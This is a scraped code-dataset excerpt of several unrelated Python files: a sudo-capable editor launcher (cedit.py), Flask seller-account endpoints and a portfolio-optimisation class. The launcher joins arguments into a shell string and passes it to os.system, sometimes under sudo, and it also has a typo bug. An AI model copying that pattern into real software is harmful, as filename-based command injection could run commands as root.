self._agent_pipeline.get_reply(input_text, no_empty_reply=no_empty_reply)\n if reply:\n self._messages_counter.reset()\n\n return reply\n\n return None\n","sub_path":"texting_ai.py","file_name":"texting_ai.py","file_ext":"py","file_size_in_byte":28008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"629652612","text":"#!/usr/bin/env python3\n'''\n cedit.py\n Opens proper editor based on file extension..\n Checks file permissions, asks for root access if needed..\n\nCreated on Jan 19, 2013\n\n@author: cj\n'''\nfrom __future__ import print_function\nimport os\nimport stat\nimport sys\n\nfrom docopt import docopt\nfrom easysettings import EasySettings\nif sys.version_info.major < 3:\n input = raw_input\n\n\nNAME = 'CEdit'\n__version__ = '2.0.1'\nVERSIONSTR = '{} v. {}'.format(NAME, __version__)\nSCRIPT = os.path.split(os.path.abspath(sys.argv[0]))[1]\nSCRIPTDIR = os.path.abspath(sys.path[0])\nOPTIONS = {\n 'editor': 'editor to open files.',\n 'elevcmd': 'elevation command for when root is needed.'\n}\nsettings = EasySettings(os.path.join(SCRIPTDIR, 'cedit.conf'))\n\nUSAGESTR = \"\"\"{ver}\n\n Opens files with your favorite editor,\n and uses an elevation command automatically when needed for\n write access.\n\n Usage:\n {script} -h | -l | -v\n {script} -s option...\n {script} FILENAME\n\n Options:\n FILENAME : File name to open or create.\n -h,--help : shows this message\n -l,--list : lists current settings\n -s option,--set option : sets a {name} option\n current options are:\n editor=[path to editor]\n elevcmd=[path to elevation command]\n to set default editor:\n {script} -s editor=gedit\n to set default elevation command:\n {script} -s elevcmd=sudo\n -v,--version : Show cedit version and exit.\n\n {name} will look for a config file in: {scriptdir}\n\"\"\".format(name=NAME, script=SCRIPT, scriptdir=SCRIPTDIR, ver=VERSIONSTR)\n\n\ndef main(argd):\n \"\"\" Main entry point for cedit \"\"\"\n\n settings.configfile_exists()\n\n if argd['--list']:\n configopts = settings.list_settings()\n if not configopts:\n print('No settings configured.')\n return 1\n print('Current cedit settings:')\n print(' {}'.format('\\n '.join(\n '{:>8}: {}'.format(k, v) for k, v in configopts)))\n return 0\n elif argd['--set']:\n return 0 if set_option(argd['--set']) else 1\n\n if not os.path.exists(argd['FILENAME']):\n print('Path does not exist: {}'.format(argd['FILENAME']))\n sres = input('Would you like to use it anyway? (y/n): ')\n if not sres.lower().startswith('y'):\n print('Quitting...\\n')\n exit(0)\n\n return 0 if shell_file(argd['FILENAME']) else 1\n\n\ndef get_editor():\n if not settings.get('editor'):\n # no editor set\n print('\\n' / join((\n 'Be sure to set your favorite editor with:',\n ' cedit -s editor=[path_to_editor]'\n )))\n # look for common editor\n lst_editors = ['kate', 'gedit', 'leafpad', 'kwrite']\n for editor in lst_editors:\n spath = os.path.join('/usr/bin/', editor)\n if os.path.isfile(spath) or os.path.islink(spath):\n print('Found common editor: {}'.format(spath))\n return spath\n print('\\n'.join((\n 'No common editors found!',\n 'You must set one using the above command.'\n )))\n exit(1)\n else:\n editor = settings.get('editor')\n if os.path.isfile(editor) or os.path.islink(editor):\n return editor\n else:\n # try /usr/bin\n spath = os.path.join('/usr/bin', editor)\n if os.path.isfile(spath) or os.path.islink(spath):\n return spath\n print('\\n'.join((\n 'Cannot find editor! Make sure you set a valid editor with:'\n 'cedit -s editor=[editor or /path/to/editor]'\n )))\n exit(1)\n\n\ndef get_elevcmd():\n if not settings.get('elevcmd'):\n # no editor set\n print('\\n'.join((\n 'Be sure to set your favorite elevation command with:',\n ' cedit -s elevcmd=[elevation command]'\n )))\n # look for common elevation command\n lst_elevs = ['kdesudo', 'gksudo', 'sudo']\n for elevcmd in lst_elevs:\n spath = os.path.join('/usr/bin/', elevcmd)\n if os.path.isfile(spath) or os.path.islink(spath):\n print(\"Found common elevation cmd: \" + spath)\n return spath\n print('\\n'.join((\n 'No common elevation commands found!',\n 'You must set one using the above command.'\n )))\n sys.exit(1)\n else:\n elevcmd = settings.get('elevcmd')\n if os.path.isfile(elevcmd) or os.path.islink(elevcmd):\n return elevcmd\n else:\n # try /usr/bin\n spath = os.path.join('/usr/bin', elevcmd)\n if os.path.isfile(spath) or os.path.islink(spath):\n return spath\n print('\\n'.join((\n 'Cannot find elevcmd!',\n 'Make sure you set a valid elevation command with:',\n ' cedit -s elevcmd=[elevcmd or /path/to/elevcmd]'\n )))\n sys.exit(1)\n\n\ndef set_option(args):\n for sarg in args:\n try:\n sopt, sval = (s.lower().strip() for s in sarg.split('='))\n except ValueError:\n print('Invalid config option given: {}'.format(sarg))\n return False\n\n if sopt not in OPTIONS:\n print('{} is not a valid option!'.format(sopt))\n print('Accepted options are:')\n for opt, desc in OPTIONS.items():\n print(' {}: {}'.format(opt, desc))\n sys.exit(1)\n if (not os.path.isfile(sval)) and (not os.path.islink(sval)):\n spath = os.path.join('/usr/bin/', sval)\n if (not os.path.isfile(spath)) and (not os.path.islink(spath)):\n print('Cannot set option \\'{}\\', path not found: {}'.format(\n sopt, sval\n ))\n sys.exit(1)\n else:\n sval = spath\n\n if settings.get(sopt) == sval:\n print('{} already set to: {}'.format(sopt, sval))\n sys.exit(1)\n # valid setting, set it\n settings.setsave(sopt, sval)\n print(' set {} = {}'.format(sopt, sval))\n return True\n\n\ndef needs_root(sfilename):\n \"\"\" Return True if a file needs root write permissions. \"\"\"\n try:\n if os.access(sfilename, os.W_OK):\n # User already has write access.\n return False\n # File is owned by root?\n return (os.stat(sfilename).st_uid == 0)\n except OSError:\n # TODO: Some logging is needed here.\n return True\n\n\ndef shell_file(sfilename):\n editor = get_editor()\n if not editor.startswith(\"/\"):\n editor = '/usr/bin/{}'.format(editor)\n if not os.path.isfile(editor):\n print('Editor not found!: {}'.format(editor))\n return False\n\n print('Using editor: {}'.format(editor))\n if os.path.isfile(sfilename):\n filetype = 'file'\n elif os.path.isdir(sfilename):\n filetype = 'directory'\n else:\n filetype = 'an unknown type'\n print('Opening {}...'.format(filetype))\n if needs_root(sfilename):\n # root style.\n elevcmd = get_elevcmd()\n cmd = [elevcmd, editor, sfilename]\n print('Using elevation command...')\n else:\n # normal style, no root.\n cmd = [editor, sfilename]\n try:\n # try running\n run_exec(cmd)\n print('Ran {}'.format(' '.join(cmd)))\n except Exception as ex:\n print('Unable to run command: {}\\nError: {}'.format(\n ' '.join(cmd),\n ex))\n return False\n return True\n\n\ndef run_exec(cmdlist):\n # runs a command with arguments.\n os.system(' '.join(cmdlist))\n\nif __name__ == '__main__':\n sys.exit(main(docopt(USAGESTR, version=VERSIONSTR)))\n","sub_path":"projects/static/files/cedit/cedit.py","file_name":"cedit.py","file_ext":"py","file_size_in_byte":7962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"218474529","text":"import json\r\n\r\nfrom flask import Blueprint, request, jsonify\r\nfrom PIL import Image\r\n\r\nfrom util.exception import (\r\n ALLOWED_EXTENSIONS,\r\n ExistsException,\r\n NotExistsException,\r\n InvalidValueException,\r\n PermissionException,\r\n PathParameterException,\r\n FileException,\r\n RequestException\r\n)\r\nfrom util.validation import KeywordValidation\r\nfrom db_connection import db_connection, s3_connection\r\nfrom util.decorator import login_decorator\r\nfrom werkzeug.exceptions import RequestEntityTooLarge\r\n\r\n\r\ndef user_endpoints(user_service):\r\n user_app = Blueprint('user_app', __name__, url_prefix='/user')\r\n keyword_validation = KeywordValidation()\r\n\r\n def allowed_file(filename):\r\n return '.' in filename and \\\r\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\r\n\r\n @user_app.route('/signup', methods=['POST'])\r\n def sign_up():\r\n \"\"\"\r\n 유저 회원가입\r\n \"\"\"\r\n\r\n db = None\r\n try:\r\n db = db_connection()\r\n data = request.json\r\n\r\n if not data:\r\n raise RequestException\r\n # key_error 예외처리\r\n keyword_validation.signup(data)\r\n\r\n user_service.sign_up(db, data)\r\n db.commit()\r\n\r\n return jsonify({'message' : 'success'}), 200\r\n except RequestException as e:\r\n db.rollback()\r\n return jsonify({'message' : e.message}), e.status_code\r\n except ExistsException as e:\r\n db.rollback()\r\n return jsonify({'message' : e.message}), e.status_code\r\n except KeyError as e:\r\n db.rollback()\r\n return jsonify({'message': format(e)}), 400\r\n except Exception as e:\r\n db.rollback()\r\n return jsonify({'message' : '서버 오류 : {}'.format(e)}), 500\r\n finally:\r\n if db:\r\n db.close()\r\n\r\n @user_app.route('/signin', methods=['POST'])\r\n def sign_in():\r\n \"\"\"\r\n 유저 로그인\r\n account, password\r\n :return: access_token\r\n \"\"\"\r\n\r\n db = None\r\n try:\r\n db = db_connection()\r\n data = request.json\r\n\r\n if not data:\r\n raise RequestException\r\n # key_error 예외처리\r\n keyword_validation.signin(data)\r\n\r\n access_token = user_service.sign_in(db, data)\r\n db.commit()\r\n\r\n return jsonify({'message' : 'success', 'access_token' : access_token}), 200\r\n except RequestException as e:\r\n db.rollback()\r\n return jsonify({'message' : e.message}), e.status_code\r\n except PermissionException as e:\r\n db.rollback()\r\n return jsonify({'message' : e.message}), e.status_code\r\n except NotExistsException as e:\r\n db.rollback()\r\n return jsonify({'message' : e.message}), e.status_code\r\n except KeyError as e:\r\n db.rollback()\r\n return jsonify({'message': format(e)}), 400\r\n except Exception as e:\r\n db.rollback()\r\n return jsonify({'message' : 'error {}'.format(e)}), 500\r\n finally:\r\n if db:\r\n db.close()\r\n\r\n @user_app.route('/category', methods=['GET'])\r\n def seller_category_type():\r\n \"\"\"\r\n 셀러 카테고리 정보 가져오기\r\n :return: 카테고리 리스트\r\n \"\"\"\r\n\r\n db = None\r\n try:\r\n db = db_connection()\r\n\r\n category_list = user_service.seller_category_type(db)\r\n\r\n return jsonify({'message' : 'success', 'category_list' : category_list}), 200\r\n except Exception as e:\r\n return jsonify({'message' : 'error {}'.format(e)}), 500\r\n finally:\r\n if db:\r\n db.close()\r\n\r\n @user_app.route('', methods=['GET'])\r\n @login_decorator\r\n def get_seller_list():\r\n \"\"\"\r\n 셀러 회원목록 리스트 및 목록 개수\r\n 마스터 토큰이 아닐 시 permission denied\r\n 필터의 key 값이 잘못되었을 때 invalid input 'key' in filters\r\n end_date 가 start_date 보다 이전날짜로 입력되었을때는 예외처리\r\n :return: 회원목록 리스트 및 개수\r\n \"\"\"\r\n\r\n db = None\r\n try:\r\n db = db_connection()\r\n\r\n if not request.is_master:\r\n raise PermissionException\r\n\r\n filter_list = ['id', 'account', 'name_en', 'name_ko',\r\n 'manager_name', 'manager_mobile', 'manager_email',\r\n 'category', 'start_date', 'end_date',\r\n 'offset', 'limit']\r\n\r\n filters = dict(request.args)\r\n\r\n for key in filters:\r\n if key not in filter_list:\r\n return jsonify({'message' : \"검색 필터의 '{}'은 잘못된 값입니다.\".format(key)}), 400\r\n\r\n if ('start_date' in filters) and ('end_date' in filters):\r\n if filters['end_date'] < filters['start_date']:\r\n raise InvalidValueException(\"'종료 날짜'가 '시작 날짜'보다 이전의 날짜일 수 없습니다.\", 400)\r\n\r\n if ('offset' in filters) and (int(filters['offset']) <= 0):\r\n raise InvalidValueException(\"페이지 번호는 1보다 크거나 같은 정수여야 합니다.\", 400)\r\n\r\n if ('limit' in filters) and (int(filters['limit']) <= 0):\r\n raise InvalidValueException(\"페이지 행의 개수는 1보다 크거나 같은 정수여야 합니다.\", 400)\r\n\r\n sellers = user_service.get_seller_list(db, filters)\r\n\r\n return jsonify({'message' : 'success', 'total_count' : sellers['count'],\r\n 'seller_list' : sellers['seller_list']}), 200\r\n\r\n except PermissionException as e:\r\n return jsonify({'message' : e.message}), e.status_code\r\n except InvalidValueException as e:\r\n return jsonify({'message' : e.message}), e.status_code\r\n except Exception as e:\r\n return jsonify({'message' : 'error {}'.format(e)}), 500\r\n finally:\r\n if db:\r\n db.close()\r\n\r\n @user_app.route('/my_page', methods=['GET'])\r\n @user_app.route('/my_page/', methods=['GET'])\r\n @login_decorator\r\n def get_seller_information(**seller_id):\r\n \"\"\"\r\n 셀러 상세정보 가져오기\r\n 마스터 토큰으로 seller_id 파라미터가 없을 시 require parameter\r\n 셀러 토큰으로 seller_id 파라미터 적용 시 permission denied\r\n :return: 셀러 상세정보\r\n \"\"\"\r\n\r\n db = None\r\n try:\r\n db = db_connection()\r\n\r\n # 마스터\r\n if request.is_master:\r\n if not seller_id:\r\n raise PathParameterException('seller_id')\r\n\r\n seller_id = seller_id['seller_id']\r\n # 셀러\r\n else:\r\n if seller_id:\r\n raise PermissionException\r\n\r\n seller_id = request.seller_id\r\n\r\n seller_info = user_service.get_seller_information(db, seller_id)\r\n\r\n return jsonify({'message' : 'success', 'seller_info': seller_info}), 200\r\n except PathParameterException as e:\r\n return jsonify({'message' : e.message}), e.status_code\r\n except PermissionException as e:\r\n return jsonify({'message' : e.message}), e.status_code\r\n except NotExistsException as e:\r\n return jsonify({'message' : e.message}), e.status_code\r\n except Exception as e:\r\n return jsonify({'message' : 'error {}'.format(e)}), 500\r\n finally:\r\n if db:\r\n db.close()\r\n\r\n @user_app.route('/my_page', methods=['PUT'])\r\n @user_app.route('/my_page/', methods=['PUT'])\r\n @login_decorator\r\n def update_seller_information(**seller_id):\r\n \"\"\"\r\n 셀러 상세정보 수정\r\n 마스터 토큰으로 seller_id 파라미터가 없을 시 require parameter\r\n 셀러 토큰으로 seller_id 파라미터 적용 시 permission denied\r\n :param seller_id: seller_id\r\n \"\"\"\r\n\r\n db = None\r\n try:\r\n db = db_connection()\r\n s3 = s3_connection()\r\n form_data = dict(request.form)\r\n\r\n if not form_data:\r\n raise RequestException\r\n\r\n data = json.loads(form_data['body'])\r\n\r\n # 파일 확장자 확인\r\n if request.files:\r\n profile_image = request.files['profile_image'] if 'profile_image' in request.files else None\r\n if profile_image and not allowed_file(profile_image.filename):\r\n raise FileException('해당 파일의 확장자는 사용할 수 없습니다.', 400)\r\n data['profile_image'] = profile_image if profile_image.filename else None\r\n\r\n background_image = request.files['background_image'] if 'background_image' in request.files else None\r\n if background_image and not allowed_file(background_image.filename):\r\n raise FileException('해당 파일의 확장자는 사용할 수 없습니다.', 400)\r\n data['background_image'] = background_image if background_image.filename else None\r\n\r\n # 파일 size (width, height) 확인\r\n if background_image:\r\n image = Image.open(background_image)\r\n width, height = image.size\r\n\r\n if width < 1200 or height < 850:\r\n raise FileException('배경이미지의 크기는 가로 1200, 세로 850 이상이어야 합니다.', 400)\r\n\r\n # 파일 스트림 포인터를 다시 초기화\r\n background_image.seek(0)\r\n\r\n # key_error 예외처리\r\n keyword_validation.update_seller_information(data)\r\n\r\n # 마스터\r\n if request.is_master:\r\n if not seller_id:\r\n raise PathParameterException('seller_id')\r\n\r\n seller_id = seller_id['seller_id']\r\n modifier_id = request.seller_id\r\n # 셀러\r\n else:\r\n if seller_id:\r\n raise PermissionException\r\n\r\n seller_id = request.seller_id\r\n modifier_id = request.seller_id\r\n\r\n user_service.update_seller_information(db, data, s3, seller_id, modifier_id)\r\n\r\n db.commit()\r\n\r\n return jsonify({'message' : 'success'}), 200\r\n except RequestException as e:\r\n db.rollback()\r\n return jsonify({'message' : e.message}), e.status_code\r\n except RequestEntityTooLarge:\r\n db.rollback()\r\n return jsonify({'message' : '이미지 파일의 크기는 5MB 이하여야 합니다.'}), 400\r\n except FileException as e:\r\n db.rollback()\r\n return jsonify({'message' : e.message}), e.status_code\r\n except PathParameterException as e:\r\n db.rollback()\r\n return jsonify({'message' : e.message}), e.status_code\r\n except InvalidValueException as e:\r\n db.rollback()\r\n return jsonify({'message' : e.message}), e.status_code\r\n except PermissionException as e:\r\n db.rollback()\r\n return jsonify({'message' : e.message}), e.status_code\r\n except KeyError as e:\r\n db.rollback()\r\n return jsonify({'message' : 'key_error {}'.format(e)}), 400\r\n except Exception as e:\r\n db.rollback()\r\n return jsonify({'message' : '{}'.format(e)}), 500\r\n finally:\r\n if db:\r\n db.close()\r\n\r\n @user_app.route('/', methods=['PATCH'])\r\n @login_decorator\r\n def update_shop_status(seller_id):\r\n \"\"\"\r\n 셀러 상태(입점상태) 수정\r\n 마스터 토큰이 아닐 시 permission denied\r\n :param seller_id: seller_id\r\n \"\"\"\r\n\r\n db = None\r\n try:\r\n db = db_connection()\r\n data = request.json\r\n\r\n if not data:\r\n raise RequestException\r\n # key_error 예외처리\r\n keyword_validation.update_shop_status(data)\r\n\r\n if not request.is_master:\r\n raise PermissionException\r\n\r\n user_service.update_shop_status(db, data, seller_id)\r\n\r\n db.commit()\r\n\r\n return jsonify({'message' : 'success'}), 200\r\n except RequestException as e:\r\n db.rollback()\r\n return jsonify({'message' : e.message}), e.status_code\r\n except PermissionException as e:\r\n db.rollback()\r\n return jsonify({'message' : e.message}), e.status_code\r\n except NotExistsException as e:\r\n db.rollback()\r\n return jsonify({'message' : e.message}), e.status_code\r\n except InvalidValueException as e:\r\n db.rollback()\r\n return jsonify({'message' : e.message}), e.status_code\r\n except KeyError as e:\r\n db.rollback()\r\n return jsonify({'message' : 'key_error {}'.format(e)}), 400\r\n except Exception as e:\r\n db.rollback()\r\n return jsonify({'message' : '{}'.format(e)}), 500\r\n finally:\r\n if db:\r\n db.close()\r\n\r\n @user_app.route('my_page/history', methods=['GET'])\r\n @user_app.route('my_page//history', methods=['GET'])\r\n @login_decorator\r\n def get_seller_status_log(**seller_id):\r\n \"\"\"\r\n 셀러 상세 히스토리 정보 조회\r\n :param seller_id: seller_id\r\n :return: 상세 히스토리 리스트(시간, 입점상태, 수정자)\r\n \"\"\"\r\n\r\n db = None\r\n try:\r\n db = db_connection()\r\n\r\n if request.is_master:\r\n if not seller_id:\r\n raise PathParameterException('seller_id')\r\n\r\n seller_id = seller_id['seller_id']\r\n else:\r\n if seller_id:\r\n raise PermissionException\r\n\r\n seller_id = request.seller_id\r\n\r\n log_list = user_service.get_seller_status_log(db, seller_id)\r\n\r\n return jsonify({'message' : 'success', 'log_list' : log_list}), 200\r\n except PathParameterException as e:\r\n return jsonify({'message' : e.message}), e.status_code\r\n except PermissionException as e:\r\n return jsonify({'message' : e.message}), e.status_code\r\n except Exception as e:\r\n return jsonify({'message' : '{}'.format(e)}), 500\r\n finally:\r\n if db:\r\n db.close()\r\n\r\n return user_app\r\n","sub_path":"back_end/brandi-project/view/user_view.py","file_name":"user_view.py","file_ext":"py","file_size_in_byte":14902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"574446826","text":"import pandas as pd\nimport numpy as np\nfrom cvxopt import matrix, solvers\nimport warnings\nimport matplotlib.pyplot as plt\nimport copy\nimport scipy.optimize\n\nsolvers.options['show_progress'] = False\nsolvers.options['abstol'] = 1e-14\n\n\nclass FactorPortfolio(object):\n\n def __init__(self,**kwargs):\n self.mu = kwargs.get('mu')\n self.sd = kwargs.get('sd')\n self.ir = kwargs.get('ir')\n self.desc = kwargs.get('desc')\n self.accuracy = 1e-12\n self.mu_min = np.nan\n self.mu_max = np.nan\n self.risk_tolerance_parameter = np.nan\n \n if self.desc is None:\n self.desc = 'INITIAL PORTFOLIO'\n \n self.factor_mu = kwargs.get('factor_mu')\n self.factor_cov = kwargs.get('factor_cov')\n self.factor_weights = kwargs.get('factor_weights')\n self.factor_name = kwargs.get('factor_name')\n \n if self.factor_name is None:\n if isinstance(self.factor_mu,pd.DataFrame):\n self.factor_name = self.factor_mu.index\n elif isinstance(self.factor_cov,pd.DataFrame):\n self.factor_name = self.factor_cov.index\n elif isinstance(self.factor_weights,pd.DataFrame):\n self.factor_name = self.factor_weights.index\n else:\n self.factor_name = pd.Index(['Factor_1'])\n \n self.n = self.factor_name.__len__()\n \n if self.factor_mu is None:\n self.factor_mu = pd.DataFrame({'mu':np.repeat(np.nan,self.n,0),},index=self.factor_name)\n else:\n self.mu_min = np.ceil(self.factor_mu.min()[0]/self.accuracy)*self.accuracy\n self.mu_max = np.floor(self.factor_mu.max()[0]/self.accuracy)*self.accuracy\n \n if self.factor_cov is None:\n tmp = np.empty((self.n,self.n,))\n tmp[:] = np.nan\n self.factor_cov = pd.DataFrame(tmp,index=self.factor_name,columns=self.factor_name)\n \n if self.factor_weights is None:\n self.factor_weights = pd.DataFrame({'weights':np.repeat(np.nan,self.n,0),},index=self.factor_name) \n \n if self.mu is None:\n self.mu = np.dot(self.factor_weights.T,self.factor_mu)[0,0]\n \n if self.sd is None:\n self.sd = np.sqrt(np.dot(np.dot(self.factor_weights.T,self.factor_cov),self.factor_weights))[0,0]\n \n if self.ir is None:\n self.ir = self.mu / self.sd\n \n def calc_mu(self):\n self.mu = np.dot(self.factor_weights.T,self.factor_mu)[0,0]\n \n def calc_sd(self):\n self.sd = np.sqrt(np.dot(np.dot(self.factor_weights.T,self.factor_cov),self.factor_weights))[0,0]\n \n def calc_ir(self):\n self.ir = self.mu / self.sd\n \n def calc_weights_min_variance(self):\n P = 2*matrix(self.factor_cov.as_matrix())\n q = matrix(np.repeat(0.0,self.n))\n G = matrix(np.diagflat(np.repeat(-1.0,self.n)))\n h = matrix(np.repeat(0.0,self.n))\n A = matrix(np.repeat(1.0,self.n)).T\n b = matrix([1.0])\n sol = solvers.qp(P, q, G, h, A, b)\n wgt = pd.DataFrame({'weights': pd.Series(sol['x']),})\n wgt.index = self.factor_name\n self.factor_weights = wgt\n self.desc = 'MINIMUM VARIANCE PORTFOLIO'\n self.calc_mu()\n self.calc_sd()\n self.calc_ir()\n \n \n def calc_risk_tolerance_parameter(self):\n self.risk_tolerance_parameter = 2 * np.power(self.sd,2) / self.mu\n \n def calc_marginal_utility_ir(self):\n self.calc_risk_tolerance_parameter()\n self.marginal_utility_ir = np.multiply(self.factor_mu - 2.0/self.risk_tolerance_parameter * np.dot(self.factor_cov,self.factor_weights),self.factor_weights)\n self.marginal_utility_ir.columns = pd.Index(['marginal_utility_ir'])\n \n def calc_weights_max_ir(self):\n \n if self.factor_mu.max()['mu'] < 0:\n self.calc_weights_target_mu(mu=self.factor_mu.max()['mu'])\n self.desc = 'MAXIMUM IR PORTFOLIO'\n else:\n self.calc_weights_target_mu(mu=self.factor_mu[self.factor_mu>0].mean()['mu'])\n self.calc_risk_tolerance_parameter() \n \n rtLast = self.risk_tolerance_parameter + 100*self.accuracy\n \n while np.abs(rtLast - self.risk_tolerance_parameter) > self.accuracy:\n rtLast = self.risk_tolerance_parameter\n P = matrix(2.0/self.risk_tolerance_parameter*self.factor_cov.as_matrix())\n q = matrix(-1.0*self.factor_mu.as_matrix())\n G = matrix(np.diagflat(np.repeat(-1.0,self.n)))\n h = matrix(np.repeat(0.0,self.n))\n A = matrix(np.repeat(1.0,self.n)).T\n b = matrix([1.0])\n sol = solvers.qp(P, q, G, h, A, b)\n wgt = pd.DataFrame({'weights': pd.Series(sol['x']),})\n wgt.index = self.factor_name\n self.factor_weights = wgt\n self.desc = 'MAXIMUM IR PORTFOLIO'\n self.calc_mu()\n self.calc_sd()\n self.calc_ir()\n self.calc_risk_tolerance_parameter()\n #print(self.ir)\n \n def calc_weights_max_ir_n(self,n=4):\n \n def f(ix):\n tmp = FactorPortfolio(factor_mu=self.factor_mu.loc[ix],factor_cov=self.factor_cov.loc[ix,ix])\n tmp.calc_weights_max_ir()\n return(tmp.ir)\n\n idx = self.factor_name \n while idx.__len__() > n:\n \n loopOver = [idx[idx != i] for i in idx] # loopOver.__len__()\n res = np.array([f(i) for i in loopOver]) # res.__len__()\n print('drop factor: ' + idx[res.argmax()])\n idx = loopOver[res.argmax()]\n \n bestIR = res[res.argmax()] \n bestIdx = idx\n runOptim = True\n \n while runOptim:\n idx = bestIdx \n idxRest = pd.Index(np.setdiff1d(np.array(self.factor_name),np.array(idx)))\n loopOver = [idx[idx != i].append(pd.Index([k])) for i in idx for k in idxRest]\n res = np.array([f(i) for i in loopOver])\n \n if res[res.argmax()] > bestIR:\n bestIR = res[res.argmax()]\n print('add factor: ' + np.setdiff1d(np.array(loopOver[res.argmax()]), np.array(bestIdx)).__str__())\n print('remove factor: ' + np.setdiff1d(np.array(bestIdx),np.array(loopOver[res.argmax()])).__str__())\n bestIdx = loopOver[res.argmax()]\n else:\n runOptim = False\n \n tmp = FactorPortfolio(factor_mu=self.factor_mu.loc[bestIdx],factor_cov=self.factor_cov.loc[bestIdx,bestIdx])\n tmp.calc_weights_max_ir()\n \n self.factor_weights['weights'][:] = 0\n self.factor_weights['weights'][bestIdx] = tmp.factor_weights['weights'][bestIdx] \n self.desc = 'MAXIMUM IR[N] PORTFOLIO'\n self.calc_mu()\n self.calc_sd()\n self.calc_ir()\n \n \n \n \n def calc_weights_target_mu(self,**kwargs):\n mu = self.mu\n if 'mu' in kwargs:\n mu = kwargs.get('mu')\n if mu < self.factor_mu.min()[0]:\n mu = self.mu_min\n warnings.warn('mu too small --> [mu] rounded up to smallest possible value')\n \n if mu > self.factor_mu.max()[0]:\n mu = self.mu_max\n warnings.warn('mu too large --> [mu] rounded down to largest possible value')\n \n P = 2*matrix(self.factor_cov.as_matrix())\n q = matrix(np.repeat(0.0,self.n))\n G = matrix(np.diagflat(np.repeat(-1.0,self.n)))\n h = matrix(np.repeat(0.0,self.n))\n A = matrix(np.array([np.repeat(1.0,self.n),np.array(self.factor_mu['mu'])]))\n b = matrix([1.0,mu])\n sol = solvers.qp(P, q, G, h, A, b)\n \n wgt = pd.DataFrame({'weights' : pd.Series(sol['x'])})\n wgt.index = self.factor_name\n self.factor_weights = wgt\n self.desc = 'TARGET [mu] PORTFOLIO'\n self.calc_mu()\n self.calc_sd()\n self.calc_ir()\n \n \n def calc_weights_target_risk(self,**kwargs):\n sd = self.sd\n if 'sd' in kwargs:\n sd = kwargs.get('sd')\n \n tmp = copy.copy(self)\n tmp.calc_weights_min_variance()\n \n if sd < tmp.sd:\n warnings.warn('sd too small --> [sd] based on minimum variance portfolio')\n self = copy.copy(tmp)\n \n \n \n \n \n \n \n def calc_weights_risk_parity(self):\n \n #w = np.repeat(1.0/self.n,self.n)\n cov = self.factor_cov.as_matrix()\n w = np.divide(1,np.sqrt(np.diag(cov)))\n w = np.divide(w,w.sum())\n \n \n if np.dot(np.matrix(w),np.dot(np.matrix(cov),np.matrix(w).T))[0,0] != 0: \n scale = 1.0/(np.dot(np.matrix(w),np.dot(np.matrix(cov),np.matrix(w).T))[0,0])\n else:\n scale = 1\n\n cov = cov * scale\n \n def riskParityScore(w):\n w = np.matrix(w)\n score=-np.log(w).sum()\n return score\n \n #def constr1(x, cov):\n # return 1 - np.sqrt(np.dot(np.matrix(x),np.dot(np.matrix(cov),np.matrix(x).T)))[0,0]\n\n cons = ({'type':'ineq','fun': lambda x: 1 - np.sqrt(np.dot(np.matrix(x),np.dot(np.matrix(cov),np.matrix(x).T)))[0,0]})\n res = scipy.optimize.minimize(riskParityScore, x0 = w, method='SLSQP' ,constraints = cons, tol=self.accuracy)\n #w = scipy.optimize.fmin_cobyla(riskParityScore, x0 = w, cons = constr1, consargs=(cov,),rhoend=self.accuracy)\n w = res['x']\n w = np.divide(w,w.sum())\n \n #mcr = np.multiply(np.dot(cov,w.T),w.T)\n #print('w:='+ w.__str__())\n #print('MCR:=' + mcr.__str__())\n wgt = pd.DataFrame({'weights' : pd.Series(w)})\n wgt.index = self.factor_name\n self.factor_weights = wgt\n self.desc = 'RISK PARITY PORTFOLIO'\n self.calc_mu()\n self.calc_sd()\n self.calc_ir()\n \n \n \n def plot(self,mu_steps=50):\n \n #mu = np.linspace(self.mu_min,self.mu_max,mu_steps)\n \n mu_f = np.array(self.factor_mu)\n mu_f.sort(0) \n mu = mu_f.copy().T[0]\n \n tmp = copy.copy(self)\n tmp.calc_weights_min_variance()\n mu_minVar = tmp.mu\n sd_minVar = tmp.sd\n \n mu = np.append(mu,mu_minVar)\n mu.sort()\n \n tmp.calc_weights_risk_parity()\n mu_rp = tmp.mu\n sd_rp = tmp.sd\n \n mu = np.append(mu,mu_rp)\n mu.sort()\n \n tmp.calc_weights_max_ir()\n mu_maxIR = tmp.mu\n sd_maxIR = tmp.sd\n ir_maxIR = tmp.ir\n \n mu = np.append(mu,mu_maxIR)\n mu.sort()\n \n while mu.__len__() < mu_steps: \n bigDiffId = np.diff(mu).argmax()\n mu = np.append(mu,mu[bigDiffId:(bigDiffId+2)].mean())\n mu.sort()\n \n # plt.plot(np.repeat(0,mu.__len__()),mu,'bo') \n \n def f(i):\n tmp.calc_weights_target_mu(mu=i)\n #print(i)\n #tmp.calc_weights_target_mu(mu=0.00163328532333)\n return(tmp.sd)\n sd = np.array([f(i) for i in mu])\n \n \n plt.plot(sd,mu,color='r',linewidth=1)\n \n plt.plot(sd_minVar,mu_minVar,'ro')\n plt.text(sd_minVar,mu_minVar,'MINIMUM VARIANCE PORTFOLIO')\n \n plt.plot(sd_rp,mu_rp,'ro')\n plt.text(sd_rp,mu_rp,'RISK PARITY PORTFOLIO')\n \n plt.plot(sd_maxIR,mu_maxIR,'ro')\n plt.text(sd_maxIR,mu_maxIR,'MAX IR PORTFOLIO')\n \n plt.plot([0,sd.max()],[0,sd.max()*ir_maxIR],'--')\n \n plt.plot([0,np.sqrt(np.diagonal(self.factor_cov)).max()*1.1],[0,0],color='k',linewidth=1)\n plt.plot(np.sqrt(np.diagonal(self.factor_cov)),self.factor_mu['mu'],'go')\n plt.axis([0, np.sqrt(np.diagonal(self.factor_cov)).max()*1.1,np.min([0-(mu.max()-mu.min())/10,mu.min()-(mu.max()-mu.min())/10]),mu.max()+(mu.max()-mu.min())/10])\n plt.grid(True)\n plt.xlabel(r'$\\sigma$',fontsize='large')\n plt.ylabel(r'$\\mu$',fontsize='large')\n plt.title(r'Portfolio')\n for i in range(self.n):\n plt.text(np.sqrt(np.diagonal(self.factor_cov))[i],self.factor_mu['mu'][i],self.factor_name.tolist()[i])\n \n \n if self.desc == 'MAXIMUM IR[N] PORTFOLIO':\n plt.plot(self.sd,self.mu,'ro')\n 